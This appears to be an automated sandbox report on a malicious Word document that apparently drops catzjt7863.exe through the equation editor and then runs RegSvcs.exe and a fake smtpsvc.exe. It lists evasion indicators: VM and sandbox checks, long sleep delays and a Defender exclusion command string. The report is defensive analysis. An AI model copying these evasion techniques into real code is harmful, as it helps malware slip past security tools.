Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 4.2.catzjt7863.exe.2459af8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.454624645.0000000002451000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.454727273.00000000024A6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: catzjt7863.exe PID: 1848, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: catzjt7863.exe, 00000004.00000002.454624645.0000000002451000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: catzjt7863.exe, 00000004.00000002.454624645.0000000002451000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2580	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe TID: 2784	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe TID: 2544	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 2960	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 820	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2928	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Code function: 7_2_0056410E sldt word ptr [eax]

7_2_0056410E

Source: C:\Users\user\AppData\Roaming\catzjt7863.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Code function: 7_2_003D11C2 GetSystemInfo,

7_2_003D11C2

Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\catzjt7863.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: catzjt7863.exe, 00000004.00000002.454624645.0000000002451000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: catzjt7863.exe, 00000004.00000002.454624645.0000000002451000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: catzjt7863.exe, 00000004.00000002.454624645.0000000002451000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: catzjt7863.exe, 00000004.00000002.456612980.0000000005030000.00000004.00000001.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: catzjt7863.exe, 00000004.00000002.454624645.0000000002451000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\AppData\Roaming\catzjt7863.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\catzjt7863.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

